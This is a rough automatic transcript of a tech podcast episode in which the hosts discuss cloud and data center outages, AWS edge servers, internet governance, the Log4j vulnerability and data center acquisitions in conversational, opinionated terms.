This week we’re covering the latest news, from the biggest Zero Day vulnerability in history, to Dorsey’s departure from Twitter, to huge data center acquisitions, the AWS Outage, the Edge, and more...
This week we’re covering the latest news, from the biggest Zero Day vulnerability in history, to Dorsey’s departure from Twitter, to huge data center acquisitions, the AWS Outage, the Edge, and more...
It's The Next Wave Podcast, episode 53. I'm James Thomason here with co host Dean Nelson and Brad Kirby. This week we're covering the latest news from the biggest zero day vulnerability in history, probably maybe, to Jack Dorsey's departure from Twitter to huge data center acquisitions, the AWS outage edge and a whole lot more. Before we get into things, though, like, how are you guys doing? I feel like I haven't seen you. In a while we haven't recorded in a couple of weeks, I personally was trapped, living in a airport hotel in Dallas going to the data center every day. Never let it be said that I'm not a hands on CEO we had petabytes of storage, it looks like looked like we were wheeling bricks of platinum, you know, into a vault, but it was actually just as hard. This is actually basically our Platinum these days. If you've looked at the prices of disks,
Dean Nelson:So CTO means we can't throw you out. So you're a chief tinkering officer, as I think it works out to be petabytes, tinkering.
Brad Kirby:I felt really guilty when I was sitting in Italy and you're in a data center. I'm sure
James Thomason:Yeah, I'm sure the guilt was overwhelming. Nothing fixes that quite like another glass of Kiante, I'm sure.
Dean Nelson:Wow. And another cheese plate.
Brad Kirby:It might have had it was the first time I had left the country in two years. So.
Dean Nelson:So how was that by the way?
Brad Kirby:It was good. It was nice, cold rainy. Yeah, that first time there. 767 days quick trip over Thanksgiving. So took advantage of that downtime, as well. Well, this
James Thomason:is our first show after Thanksgiving, my family rid of the big mansion in Northern Alabama. We had a whole family there loves turkey. Let's hope everyone had a great Thanksgiving. How was your Thanksgiving Dean?
Dean Nelson:I actually drove down to Los Angeles. You know, my daughter's in that musical love, actually. And she's doing eight shows a week. So she is Natalie and she is crankin. And so we went and saw basically went down for Thanksgiving, her only day off was Thanksgiving Day. So think about eight shows a week, she usually has been days off, but they shifted it to Thanksgiving Day because they were given giving I guess, the woman down there we hung out we had a very small thing. It was great just to relax. And we made some food up here in the Bay Area, drove down and beat it up where she's staying. And it was just fun. Then we drove to Vegas, AWS, all that stuff and came back. And then we went saw her opening show. So it was good. It was good. And
James Thomason:maybe that's a good place to start with AWS on the data. I mean, so you're at you're at reinvent the big AWS conference. I was in the data center doing real work while you were at the trade show. But tell me how did the cloud look from the outside.
Dean Nelson:I didn't go in I actually was doing meetings outside, which is it's insanely hard to get in there and you spent a lot of money, but I had a lot of different meetings with people in the same hotels. It was very busy. I was watching all the announcements and having conversations with lots of people. But I wasn't hitting the floor.
Brad Kirby:You're both going to be in Hawaii together and
James Thomason:Oh, yeah. PTC that's the plan yet. Yes, I think telecom. That's fun. I'll
Brad Kirby:be jealous for that.
Dean Nelson:Yeah, we'll have a cheese plate for you. How's that? There we go.
James Thomason:A poopoo platter,
Dean Nelson:pipi. Yes, of course, I'll take it must have. I also got my third jab. Didn't really. I did. Since I had COVID. earlier. It didn't affect me much. But my wife got knocked down for about four days.
James Thomason:Have you grown a new appendage or anything like that? No,
Dean Nelson:I haven't.
James Thomason:Oddly, no, hardly No. Well, I hear that's a side effect. Oh, is it I see a little ointment cures a write up so you don't have to worry about it. If it is
Dean Nelson:all right. Well, sometimes I feel like I need a third hand.
James Thomason:Don't we all? Don't we don't? Yes, we do. Well, Amazon had a big outage, like a major outage. And it was in US east, which is their biggest region where like I think everybody's stuff. The internet is for the most part that like the entire that is for those that started at 7:30am. Pacific on Tuesday, December 7, last for five hours and affected customers using all kinds of stuff in the US region. Five hours in the cloud is like a long time. That's a long outage for a major cloud service. Right? I mean, that's, that's up there probably in the list of, of all outages in Amazon had a really lengthy explanation of what went wrong. And it had to do with basically network devices getting overwhelmed that we're doing network address translation between two different parts of the Amazon services in East so that added to the latency, the latency, created cascading effects, and pretty soon, everyone is staring at their navel wondering what to do five hours of that I'm sure that was a lot of fun for the internal teams at Amazon to deal with an outage of that scale. There's definitely no pressure from executive management when the clock is ticking on every single customer that you have in the region. So congrats to data was seen for resolving that outage even though I'm sure it wasn't fun.
Dean Nelson:Yeah, outages are no fun. I've got my share of scars throughout the industry and the fact that this one came after the Facebook outage. So if you think about the Facebook one that was a that was really a network configuration thing that cascaded rapidly all over the world. This one was a DNS, right?
James Thomason:Oh, the ultimate impact was on DNS, right. So you had this congestion, which slowed down NAD which disrupted the network, which disrupted DNS, which disrupted everything. I mean, that's my understanding, at least from a cursory reading of the rather long and wordy explanation of what happened. But kudos to Amazon for being pretty transparent about exactly what transpired to create the outage. But yeah, sooner or later, you're going to have to have people who understand how the internet works again. So I'm looking forward to coming out of retirement at the age of 70. And making $4,000 an hour to explain how DNS works. Gotcha. And how to fix ancient routers and ancient NAT boxes that no one knows how to fix anywhere that's gonna raise I think the retired COBOL programmers coming out for the military who are like getting hundreds of 1000s of dollars to resurrect some piece of code
Brad Kirby:Cloudflare that happened on recently as well. Who did Cloudflare Oh, really? Oh, yeah. Yeah. Same outage is prefer, but it came down to that work. So yeah, if you
Dean Nelson:look at the cascading effect of this, this is the thing that scares I think infrastructure leaders of the most is what don't you know, what parts are going to start to affect the next step? Because the dominoes start to fall. And that's exactly what happened in each of these outages. Because architecture is supposed to put together these canaries right canary in the coal mine limits the blast radius, the blast radius now allows you to say I can contain it to a certain area versus letting it cascade. But in the Facebook outage, I was talking to a CISO at another company, and they had reached out to Facebook specifically to say, hey, is this a DDoS attack was going on because they were up and down for like eight or nine hours and impacted Instagram and all types of things. And he heard from them that it was actually a network configuration of automation. And that propagated so fast, it couldn't stop it. But what it did is wiped out routing, right tables everywhere. And it bricked devices physically, to go to these data centers. That's
James Thomason:right. And that's what took so long, actually. And that's I think that's the funniest part of it is that the keycard access that they had built onto the cages inside the data center to allow employees to get into the equipment and work on it very secure. Because in fact, when the network went down, those those key card readers stopped working, and no one could get into the cage. They actually had to wait on someone, this is what I heard third party from maybe an insider. And so who knows 100% The truth of this, but the rumor was that they had to get in with a grinder and they were waiting for a guy to show up and grind the cage to actually physically get in. And so they couldn't go in and fix the problem until they had cut cut their way into the cage. Because the keycard reader was tied to the network in the network was down, which I think is if that's the truth of it, that's hilarious. And that's exactly the sort of thing that happens when you blow off your own leg in this space, right? When you're running high availability, infrastructure, it's always some sort of cascading problems that result in you being a complete dumbass. At the end of the day. It always ends the same way.
Dean Nelson:Totally. And I don't mean to laugh, I'm actually chuckling because of the pain that I felt in my own right, I'm gonna walk you through a really quick out is that I had at a company I worked at, I'm not gonna say who it was. But it was exactly the same cascading effect. And you reminded me that it impacted the network. Ultimately, we had a facilities technician, right, basically going into a Taz unit. This Taz unit is the air conditioning and has these variable frequency drive pumps and everything in it for waterflow and all stuff into the data center. And so they do a regular scan, an IR scan. So basically an iris scan says I'm scanning this device, and I've seen if something's hot. And so what they found was some of the capacitors within this, this variable frequency drive, which regulates the motors were going bad. So they scheduled maintenance took the entire Tasman, it's like a thing about a 2000 ton massive unit. And underneath that is where all this pumping stuff is at. And so they're in there, and then they take it offline, there's enough redundancy across all this is fine. And they start changing out all the capacitors, put it back together, follow a procedure, and then they flip the thing back on and it blows up. Right? It's just in all the passengers implode everything, just it all it all blows up.
James Thomason:It's okay to smoke back inside too. And once you let the smoke out, that's real, real tough to get back in.
Dean Nelson:But just like we said, you should be able to have this containment, because he took it offline. Right. So what happened though, is that he stepped back PIR protocol because you don't want to kill anybody on this. He stepped back. Seven seconds later, it lit up again. So it would it's dead and then it energized again. Right? And then he's like what's going on, and I got a call that we had some type of network issue in a whole nother region. But what had happened was this tech when he did this came back out and realize wait, I don't have access to anything. And what had happened is he put in a capacitor and backwards and so it was a ground fault. And what happened in that thing was when the energy came up, it now sent this ground or thing right up to the main okay, and that main has a ground fault protector in it. And you're supposed to stop it but it's just like your house right? You got to do it. have a relatively nice house right CFI. And so same thing, but it was so fast. And we found out later that the Commission on the data center wasn't done correctly. So went right through that breaker and went to the main. And that's a 4008. Mean, okay. So that main did its job 4000 amps went shut off. So basically, B went away, A is supposed to stay on, okay, all the pumps, everything else is going? Well, internally, what they found was, when the system was watching, we have an automatic transfer switch. Because what happens in data centers, as you're watching the utilities, you got an eight feed and a B feed. When you lose a, it sits there waits, it says, Oh, I lost power. Seven seconds later, it transfers to B. So they don't expect to have an outage internally, it looked like the utility went away, which means that that automatic transfer switch, transfer the ground fault to a partner, and so the other 4000 went down as well, excellent, which means the entire cooling system, right went off, pumps have stopped right? In a very large data centers, which means all that water stopped flowing, which means the data halls, three of them all sudden, overheat. Every everything went to thermal and they all started shutting down. But at the same time we lost network and no one could figure out why. And we found out that the two network MMRS were on the same electrical distribution as the cooling system. So you've isolated the theta halls and those went down. So it gets better hold on. So when that went down, right, then everyone thinks there's an outage in a whole nother area because there's no more network. But what happened is we lost everything in there that exposed another bug. Because first off, we had all of the security cards, he talked about the badge readers, right? They were on that same electrical distribution, which means we had magnetic locks on the MMRS. They locked shut with full on bolt. Right? That's right. So the network calls are done. So here, the data center guys are freaking out trying to figure out what's going on. And we'd lost power across everything like that, then they realize what's happening. We're on the calls, trying to figure out what's what's, what their mitigation is, they were able to get back, they took this unit offline, turn it back up, and we couldn't get in the room because of the network room. So the network's completely off, then energized, turned it back up and want to make sure it wasn't gonna cascade again did that then they get in the room. And all of the routers on the left side, for one of the corporations, were bricked all the Cisco 6500s had, they literally would not boot anymore. Because that exposed the other bug that we'd found where Cisco said if you lose power on both sides, it actually wipes out the firmware on the controller cards on the 6500. Right. That's why we found that were placed it but one side, we've done all that upgrade. The other side. The other one hadn't done it yet.
James Thomason:Would you say you found that it means that you you've hit a bug in production, no doubt. So you get to experience that firsthand. And you know, this stuff is so easy to get wrong. And the way actually that it's done to try to prevent these kinds of errors from cropping up is we live off of checklists, right? Everything we do operationally, there's a checklist like a pilot doing his pre flight check, there's or launching a rocket into space, there's a checklist for everything, plug this year, plug that there and sure this labels this red to red, black to black, all that stuff. And it's so easy to screw up. And I can testify to that putting my sore arm back into a data center again this week, which it's never, by the way, a good idea to send your CTO, even though they may know how to do it, it doesn't mean that they're going to be good at it anymore. And so things definitely took longer than they they should have. But I feel for the operations teams because these things are always going to happen. Chaos is always going to ensue. And there's nothing that you can do to prevent unknown, unpredictable cascading failures from happening. You have to plan on failure happening and plan a plan on the recovery and how do you start from zero and triage to recovery from starting with very basic things when especially when dealing with the failure is and work your way back up the decision tree to find the find the complexity is the way things manifest sometimes just like your observation that another piece of the network is down, which seems tangential to the problem that you're working on. And this causes I've done if you've been through this, but when you're a technical person in a firefighting scenario like this, and invariably some well meaning colleague will come up and explain the bizarre behavior of something that they are seeing. You just want to tell them look, I know that you have summoned Beelzebub over there, but I am in the midst of this issue. untangling a rat's nest of cables literally became though you just waited everything will be fine. When you get these cables plugged back in everything will be fine. Trust me speechless
Brad Kirby:firefighting. My worst situation was actually when I was at, like I say the company but it's during a quarter end, where our financial systems went down because the data isn't actually cut on fire. And the Dr. Did not, didn't work parse our word over two weeks. Wow. Holy crap. Two weeks or two Are you have about
James Thomason:a five hour Amazon?
Dean Nelson:This is the whole point of business continuity planning, right? Yeah, I
Brad Kirby:know when I worked at Deloitte, we did a ton of that. Okay. We had our we were like the Dr. We had our own, like the were the place to go for most of the hedge funds and financial service providers there. Wow. So I know quite a
Dean Nelson:few weeks. This goes right back to what James was saying, Sorry to go into this detail on it. But it also is about testing. And so I mean, there's a reason Chaos Monkey was created. They did that to inject faults all over the place, so that people would have to go back and plan for failure. And I think a lot of this infrastructure especially, nobody wants to go say, Yep, let's take the datacenter down and validate like,
James Thomason:well hold those listeners not in the know of this particular domain. Chaos Monkey is a software tool, which simulates failures by randomly doing bad things to your infrastructure, like shutting down ports, power cycling equipment, that shouldn't be power cycles, and generally creating chaos. hence its name, cast monkey. And that's a good way to sort of stretch your wings, exercise the team and figure out if you're able to recover in these types. It's a good practice. It's like a team doing a Scrum or something, right? Like you're just you're out there in a firefighting scenario, and you're you're keeping your skills sharp, things may not go wrong for a really long time in the datacenter. World, I mean, things just run most of the time, it's only the two tenths of 1% of the time that it goes down that everyone wants to pay attention to who you are and what you do. And suddenly, you're the most important person in the company, and then they forget about you for the next four years. So
Brad Kirby:I will say that the Treasury system that I implemented was still working fine. But that was set to go read my story. So not to brag, but
Dean Nelson:just to wrap this topic up, if you think about it, the lessons learned from the people who have the scars, if you're not testing your systems, Murphy will test them for you. No matter what it's going to come to a day where they're going to say something happens because it wasn't planned. And all of those little things that you haven't looked at are going to come back and bite you. So it is worth it. And executive as I said, listen to that one, support your teams to actually do it. Because in the end of it, you're gonna avoid things like this.
James Thomason:Yes, it's not the chaos. It's how you respond to it, how well trained and prepared you are to deal with it. Because chaos is going to happen no matter what you can't, you'll never be able to flush out the unknowns plan for failure. Well, apart from the the outage, I mean, Amazon had a big week with his trade show. And you were there lurking outside, not going inside. Now don't blame you. I had lots of friends and colleagues on the show. And it just looked like it looked like a great breeding ground for new variants of COVID. That's what I saw. The large numbers of people packed into AWS reinvent, I don't necessarily like going to trade shows anyway. And it's just it's not a good time. So too big of a show too much too much going on. But one of the more interesting announcements that came out of the show was Amazon is starting to pay a lot more attention to the edge, go figure. Go figure. So Vernor, CTO was on stage. He said, You know, we've already seen the cloud practically go everywhere. The shift will witness in 2022 is the cloud becoming highly specialized at the edges of the network. So suddenly, the edge is kind of becoming important to Amazon. And I think this is a sticky point, which I'll come to in a second. But Amazon today operates in 25 different geographic regions. It's maddening. It's massive, right$60 billion of revenue 81 Different availability zones, 310 points of presence to serve over 245 countries and territories. So that's the biggest of the big the scale problem, though we haven't even started to feel when it comes to talking about the edge though, when you think about the fact that we've talked several times about data growth and the fact that we're going to hit somewhere between depending on who you ask 170 250 zettabytes of data by 2025. And beyond that kind of scale. Just to put this in perspective, you know, to copy 10% of that data back to the cloud and process, it would take five and a half years, if you dedicated the entire internet's bandwidth to the project. It's never I'll say never with four asterixis but never going to be economically or even technologically viable to move data back to the cloud to process essentially the way we do. And I think Amazon is beginning to capitulate to this notion, probably because it's what their customers are telling them. But it's also because this is an inevitability, right? And so the sticky spot is that this requires deploying infrastructure at the edge, which shameless plug that's what my company's doing, right? We saw this opportunity earlier, we're out there building this edge deploying 10s of 1000s. Of pops. The difference for us is that we don't have a cloud infrastructure that we're trying to make money with, that we've already invested in. Right. And so I think the biggest challenge for Amazon and Google and Microsoft all these companies is that they now have to to invest net new and building out the edge and so that's going to make them very tempted to try to do that. And so they announced the new outpost servers, which are one in two EU Data Center servers, not really edge form factor. They're pretty they're pretty large boxes. Take the cool looking, I think The small one is a graviton shoe that's Amazon's internal silicone. Yeah. Which by the way, I think is one of the ways that they are going to continue to differentiate is, which is to create their own chips to do the specialized things that they need and in their hyperscale environments, but that's arm that's rabbits on 220 gigs of memory, about four terabytes of storage. And it goes all the way up to a two rack unit, that's an Intel icelake x86 256 gigs of RAM, and about eight terabytes of storage, that's all solid state NVMe. So those devices, they are provisioning at a cost of about 1000 bucks a month for the large one. Or you can buy down just like you can reserved instances, you can buy down the cost for nine or 17 grand I think respectively for each one of those. So, but this is an uncomfortable moment, right, if if this goes too far, and I predict it will go to it will necessarily go too far. I think this is where the the pension the architecture comes from, it's the idea that you're merely extending local, what Amazon calls local zones, local availability zones, and you're gonna manage them the same way, because a certain point that becomes untenable, right? It becomes to do, there's too many and you require human being to think about how that works, and how it should work and how the software you're deploying is going to talk to the other software deploying and database instances. And that's where that's where all this whole, I'm calling it early, you know, I think the end of the cloud model is nigh, I believe in it so much, I started a company to try to profit from it. And we may not be necessarily the winners there, I hope you will be we're trying very hard to be. But here it is, right here it comes I think Amazon's ahead once again, ahead of the curve amongst their peers, their competitor, their peers, right, and push them to the so that I have to hand it to them, they're ordering experience. So they really got their kinks worked out, I think was snowball and the other kind of edge devices, the ordering process, etc, for getting one of these servers on premises slide easy, and they're operationalizing for you. So you don't have to do anything more really than plug the cables in and make sure it gets a DHCP address. And then you've got a local zone. So I say that and they're my competitor, but credit where credit's due, it's a pretty Polish clean experience, and one that leverages the Amazon supply chain to do what they're good at. So I have no doubt that they're going to be tremendously successful in this space. But here they come. Here they come in. So expect the dominoes to fall in 2022. The other guys will be pushing in right behind to try to crown to the space but totally limit because they're going to cannibalize their existing investment r&d. That's the right Well,
Dean Nelson:the way I look at this is that this is validation. We've been talking about the US for a while, right. And the cloud players have been trying to figure out what it is that they're going to do, because before they defined a zone, or sorry, a outpost was a rack. Right. But when they get a whole rack region, right, when they go into a region, they go into usually three large zones, right? That are I mean, big, we're talking megawatts, 10s of megawatts worth of things in zones. And then that is those big reasons that we're talking about. So they've gotten smaller. And now they're saying we're gonna do a zone, meaning not a region, but a zone deployment. And now they've gone down to right outpost and then to a rack that you can deploy in your server. The validation is, is that it is pushing out towards the actual data it's putting out to where the the workload is. What I will tell you, James, is that it's okay to get 1% of cloud market.
James Thomason:It Yeah, it is. Okay. Yeah, that would be okay. That's
Dean Nelson:$25 billion market,
James Thomason:I'm good with that.
Dean Nelson:It's okay to take$3.4 billion with that. And it's almost noise in the in the Amazon side. But you're right, that all of these other cloud players are going to be coming in because they're all figuring out their edge strategy. So Microsoft, right, Azure has got their their EDGE Development, that they're doing the same kind of thing across what Google is doing. And they're leveraging what they've done for their network edges that Uber used to use, right, and others use for for terminations and TCP and things. But there's going to be so much data and so much demand, and then it's going to come down to capacity and replace price again, right. And the types of workloads are going to be on there. It's a very big space, and lots of players are going to be in it. I mean, I'm seeing it on my side, all the cool
James Thomason:kids are building edges, okay, and five years from now. No one's gonna care about closure, NetEase, or containers, or any of that stuff. It's all going to be about the Edge Computers and these big distributed computer systems. So I'm tremendously excited. And I'm in a way you never want to see the sandworm turn their attention in your direction. But luckily, there are other sandworms that that Sandra has to fight on Dune. So. Again, if we just if we Yeah, exactly. If we just good snatch up a mere one or two or 3% of the market that that's a really good starting point for little guys like us. Well, yeah, a good segue there is that there's an article in the register, it was covering a study that the internet technical success factors group, which was commissioned by AP neck and LACNIC. Those are the regional Internet address registries, if you don't know that is. So it's kind of a big, comprehensive paper. What they were looking at is like, why did the Internet work? We tried to build global networks for a long time and various other ways. But why why did the internet model work? Why did it take off? Why did they succeed? Why is it continue to succeed and what are the architectural tenants are the the characteristics of the internet that we want to try to preserve. Right? I think this stuff tells another story we'll get into in just a second. But they basically identified five things. The first was scalability. So the ability to as a truly distributed system to keep adding more infrastructure and scale it, the flexibility in the networking layer, so you don't have to reprogram the entire internet, from a networking standpoint, when you plug in a new device. And that was not always true in computer networking, when you, when you plugged in a new thing, you had to tell all the other things about the new thing that was, you know, tremendously painful in various different pre IP networks. And those two things together make it tremendously adaptable to new applications. So again, you know, there's this loose coupling between the applications and software and the underlying infrastructure. And last but not least, is resilience in the face of outages, you know, like Amazon. So even though Amazon was down, and it's a ton of stuff, the rest of internet went went humming and singing right along. Amazon's competitors, no doubt, Lee are clapping wildly, and bringing out cigars in the boardroom. But this is interesting, because we're at a juncture in time where call it like the somatic principles of the internet that came about in the early 1990s, and sort of stuck with us through the 2000s are starting to get challenged primarily by big government. And so what's happening is that the like in this report, for example, they call out the amount of traffic that's moving across private networks inside of places like Amazon as a potential risk to these architectural tenants. Because those are areas where proprietary technologies could emerge that break some of these sort of architectural tenets overall, and the government is looking at this and saying, well, since we've had this free and open internet, since the 1990s, bad things have happened. You know, we've got massive propaganda. Big governments, like Russia and China are using this for to spread disinformation and screw with our democracy. Therefore, we should reevaluate whether we really want to have a free and open internet anymore. Do we really? Do we really want that? Or shouldn't? Shouldn't we step in and regulate all this stuff? And make sure that things are done in exactly the way that the government wants them done at all times?
Dean Nelson:Yeah, that sounds like a great idea.
James Thomason:Yeah, it's gonna be it's great. So there was a leak. And this was not a paper. In fact, the heading of it said, not a paper. But there was a leak from the Biden administration, which is expected to launch this alliance for the future of the internet. And by the way, whenever you hear a title like that of a government entity, it is almost invariably a horrible thing. It's the exact opposite of what it claims to be. The formation of the Alliance said the NADA paper leaked document was in response to two major trends. The first is the rise of an alternative vision of the internet as a tool of state control promoted by authoritarian powers, such as China and Russia. And the second is the need to reassess the aspirational vision of the internet that prevailed from the 90s to the 2000s, in light of the challenging developments, including a worldwide misinformation epidemic, the concentration of power among a small number of dominant tech companies, and the rise of cyber attacks and other security concerns. So we're at a juncture where we really could destroy the internet by allowing people who don't understand it to come in, build regulations put into place rules, that might be well meaning, in a sense, but ultimately break the architectural tenants which are in place which have made the internet successful in the first place, the proverbial slaying of the golden goose, right to find out what makes her tick inside. What do I think about this team?
Dean Nelson:Well, the initial principles for the Internet were three, openness, simplicity, and decentralization, those three things have stuck. That's the first thing that if we get a government entity involved in this one and the regulation and control it, we're gonna slow everything down. And it's just gonna, that that doesn't seem like an open, open thing. The second thing comes down to me is that we don't want to blame the technology for the bad use. If you look at these campaigns, you look at all the stuff that's going on. It's the application of that technology that's enabling this misinformation campaigns, and, you know, government, or governments that are actually using this for launching other things like what we've been talking about before. And no matter what the technology is there, it's going to be used either for good or for bad. And I don't think that the regulation like this is gonna is going to solve that problem at all. It just basically makes an authoritarian type system to say this is how things are going to be done. And that will have implications in and of itself. So I think that the technologists just like we had with the internet at the beginning should be defining how the technology can remain open and secure and controlled, not the government agencies coming in to do it. If you think ARPANET and all the others, they were enabling the funding and the development of the technology, but they weren't. They weren't actually defining or controlling all aspects of it. They're enabling the people to innovate and come up with the solutions that needed to be there.
James Thomason:Do you remember what the first message was that was ever sent on the internet between UCLA and Stanford? On the very first network of I
Dean Nelson:remember that I was at UCLA when they did the the 50th anniversary, and they've said that forgot what the word was, but didn't have not have enough memory to send it.
James Thomason:Yeah, there was. Yeah, so so it was at Ulta Hall, and the South Campus of UCLA. And there's a student on the telephone with a colleague at Stanford University. This student was in a research group headed by Charlie, Charlie Klein was a student was headed by Leonard Kleinrock. And they're trying to do something really simple which Klein is attempting to type the word login, which is a pretty important word. Yep. To the remote computer. And so he types the first two characters type he's going slowly right so it's the URL on the on the phone. He's like, Did you see the URL? I got the URL. Okay, good. And he hits Oh, and as you see the URL, okay, got it. Oh, and when he hits the G the whole thing crashes, right. So the first message was low, low and low. Internet.
Dean Nelson:It should have had another l
Brad Kirby:there's actually a documentary about that. I was there. I don't have the answer that as well. But yeah, yeah, there was when Bill I think
James Thomason:didn't Verner Hertzog did that exactly. Documentaries? Yeah. Yeah, I watched a piece of that a while back when I was rewatching, his 1978 film about the colonization of South America by the Spanish which was disturbing. Everyone should watch that. It's a great result.
Dean Nelson:What's a call crap starts with an A
James Thomason:low, low.
Dean Nelson:Low colonisation,
James Thomason:why am I drawing a blank on the name?
Dean Nelson:You can't have a senior moment man. You can't not right now. not old enough.
James Thomason:I am totally having a senior. Ironically, I watched that when I was young what it was as I was in the datacenter for days and weeks on end, and I actually watched that during that I went back watch that documentary during them so
Dean Nelson:nice. All right. Well, research. Aguirre Aguirre. That's what it was a girI.
Brad Kirby:That was that was two seconds away. As Okay,
James Thomason:Aguirre the wrath of God. That's the movie. That's a great, that's a great film
Dean Nelson:still. Okay, Gary, the wrath of God. Psalm 7272. Okay, it was earlier
James Thomason:than I said, 78. It was it was early 70s. That's a great film, weird soundstage in that film, but very cool, very cool movie. That was before Hertzog was like a documentary guy, which he is well known for. I think these days is making lots of documentaries. So we were talking about
Brad Kirby:Amazon's outages, but there was a massive zero day bug that was discovered last week. Oh, yeah. And Amazon, Apple, Tesla, all the major companies have said they're extremely vulnerable, right now. Let's log for J. Right? Yeah, it's effectively they think it's gonna get back to about 200 million devices, or about a million attempts at hacking over the weekend, in a couple days, from actual, your typical kind of cyber terrorists out there that have their own ransomware and whatnot. So I'm still terrified of that. I think it's just getting worse, like when you have this open source project that the CEO of Cloudflare comes out and says, it's actually been open bugs since 2013. Nobody knows that, though. Until about December 1 of this year. And then when Apache announced it, that's when it went. Once it's released, it's out there in the wild.
Dean Nelson:By the way, here's how to hack me. I wonder how many people go. It's not easily
Brad Kirby:patched because it's so pervasive.
James Thomason:architectures. So well, this is why you know, I, I have never liked to Java at all. Java is the devil's concubine. That's what I've always said. It is. Mr. Gosling would not like to hear that from you. He would not like to hear that. I met him, I admit. And I acknowledged the good things that Java helped push forward technologically. But I've never enjoyed programming in Java. And I've certainly never enjoyed running Java apps in production at large scale. And there are better things to do the log for j is exactly what it sounds like. It's a library to help you emit logging messages from your Java code. There are a built in mechanisms for this like, System out println, you know, that do this, which the problem with that is, of course, you need to get your logs formatted in a certain way and stuck into a certain place because logs generate data, data becomes unmanageable. So I would say like, everything uses log for jabbing. It's been a while since I've been in the Java ecosystem, owing largely into my hatred of it, but I would say back then everybody used wire for J like it's just one of those fundamental sort of little open source libraries that ends up getting included in everything. So it's hard to underestimate the impact of this one, literally. Probably every Java project of significance out there has got Stupid Love for Jana. No offense to the creators of life for J Thank you for your contribution the open source community Yeah, managing logs up to this point. And again, like this, bugs like this can happen to anyone I have had security vulnerabilities filed against my own code. There's no programmer on Earth who's written a lot of code, who hasn't done something that they just didn't see at the time that they were writing it to create a vulnerability demo. So we all do it. It's just inevitable. But poor bastards, right. But this is a big one, like it will take years to mitigate fully, I think,
Dean Nelson:if it's that hard to actually go back and undo,
James Thomason:it's not that it's just that everything will have to be rebuilt and redeployed. That's the nature of Java, right? So you're gonna have to make new builds of everything and get it out there. So imagine doing that across the entirety of Ubers production, right, it would take a while, right, even for a company like Uber that kind of had their act together for that sort of thing. So imagine being the kind of company that experiences a data center outage for two weeks, whoever that was, and like how long it would take to mitigate something like this or even identify the habit,
Dean Nelson:man, how many zero day bugs are out there? Think about it. This is eight years in the making?
James Thomason:Yeah, the answer is like a lot. And they're probably hoarded by state actors, for the most part to be used as really like one time you strategic weapons that you can deploy. Speaking of which, I don't know if you have any, if you saw this news, or if it's even news or just wild speculation, but there was in the I keep a watch on kind of like the military industrial news. And there was a lot of speculation that China is deploying weapons, missiles, inside of containers, which are affixed to ordinary container ships that can be activated at any moment to Ford deploy, and, you know, attack any port that they might be sitting in. So like intermediate range missiles, and these are absolutely basically undetectable because you're sitting inside of containers, right? Unless you're inspecting every single container. And if the ship is sitting off your port, you know, has it come into board yet? How would you know? Right? And of course, that violates probably every treaty and naval convention that there is in terms of hiding active weapons on civilian ships like that. But that doesn't mean that they wouldn't do it. I don't know if there's any truth to it, but it did flashed across my screen the other day, and I thought that is like evil genius level stuff, right to put intermediate range missiles into containers, and then boop, hit a button and you just annihilate a bunch of ports of your enemy. That's a one time use thing. Right? So Dean, are you scared of for deployed Chinese missiles?
Dean Nelson:I'm scared of anybody's going to put some kind of weapon inside of a country that isn't theirs. That can be remotely executed? Yes.
James Thomason:So these are one time use, right? I mean, you you do that one time, and the jig is up same for these zero days. But these things turn up in really unusual places. Like I don't know if you know, the security researcher Chompy. under your name is Valentina Damiani. She's had a research company in Chicago, she found a kernel vulnerability using ebp F, you don't ebp F is the new, fancy F No. new fancy BPF project. Basically, it lets you run byte code in the kernel that does low level network processing. Next, yeah, like within the Linux kernel. And so she was able to demonstrate, I think, several different exploitation techniques for that actually do it. Security nerds. There's a great article out of grapple about that if you you've probably already seen it if you're security nerd, but I found it fascinating exploit. And I think the interesting thing of this is like finding exploits like this is a really low level activity. I mean, you really have to get down into the weeds and think about this stuff. And like Who has time to do that? If your name isn't Giambi? Not me. You're not going to be able to plug it in a data center. Oh, oh, Dad.
Dean Nelson:Did you see that was a double joke, by the way. Chomp. Oh, yeah. And then that was it. Thank you the bit.
James Thomason:brutal, brutal. Yep. Okay, well, switching gears a little bit. There were a flurry of acquisitions in the data center space. While we were away, some of us in Italy. Some of us said trade show some of us in the data center. First and foremost, I want to mention that previously on the show, we had it renews President Ellie Finn on wonderful show. Super interesting what they're doing and they have been acquired. And I gotta admit, I did not see this one company. They were acquired by Iron Mountain, which is best known, I think, for secure document storage and shredding and that kind of thing writing.
Dean Nelson:Yeah, but they also have a very large data center division, pretty large portfolio. And when I was at Uber, we had a deployment in Iron Mountain, which is actually in a mountain. That's a one in Pittsburgh. It's why it's called Iron Mountain. Is that right? Yep. It's 240 feet below the earth. And so when you go in there, it's really cool. They've got a, I always find it funny. When we have to expand, they have to use dynamite in a data center. So they drill into the bedrock. They put in their dynamite sticks, and they blow out sections so they can carve a room. That's going to be a data hall inside. So we had deployments over there, but they've got all the documents from the movie series, HBO, all the films those they store them in that and we talked about on the show before I think when When 911 happened, that's where Dick Cheney went to was there. And then so for the separation and isolation,
James Thomason:yeah, down the rabbit hole went to ground faster than Dick Cheney international crisis. That's what I used to say.
Dean Nelson:In a bet in a vault in it isn't. But this acquisition, it also caught me off guard too, because private equity has been going to town on acquisitions, as we've seen. But Iron Mountain was acquired by a data center company and really a data storage company, but also the division, but there's so much volume, the stuff that it renew deals with the ingest of retired equipment, right, and the refreshing and renewing or parting out of those things. That's a massive, massive supply chain management thing to happen. But there's such a value and it renew because of the renewed hardware itself and what it can be used for. They were sold for 925 million,
James Thomason:right? Yeah. So much value in fact that they paid 12 times a bita for it renew seven or 25 million in cash, the remaining 20% in stock. And I guess that what that means is that Ali is taking us for a steak dinner. I think that's what that means.
Dean Nelson:Actually, I think she's buying the entire chain of restaurants for we go to in what we want. Congratulations, Ali, and to ideen, the actual CEO over there. So the presidency or I'm sure clapping their hands and going into the next phase of what's going to happen at their company.
James Thomason:Absolutely. Congratulations, guys, and couldn't happen to a nicer team.
Dean Nelson:Yep, speaking away. So I got I got to share something. You know, we had the I Mason's awards on December 15. And the technology Champion Award winner was elephant. Oh, really? Very cool. And then on top of that, ideen won the sustainability Champion Award from Datacenter Dynamics last week as well. So yeah, they're having a really good banner year really good week, you know?
James Thomason:Yeah. Yeah. So really, Banner December. Merry Christmas, Happy Holidays.
Dean Nelson:So congratulations, daddy, Monza intelli, yeah,
James Thomason:yeah, amazing. Amazing. And there were more there were more data center acquisitions are more more acquisitions in the space. Right? So Cyrus one, and core site 25 billion, billion a day, billion in a day, the same
Brad Kirby:day, the same days,
Dean Nelson:same. Same announcements,
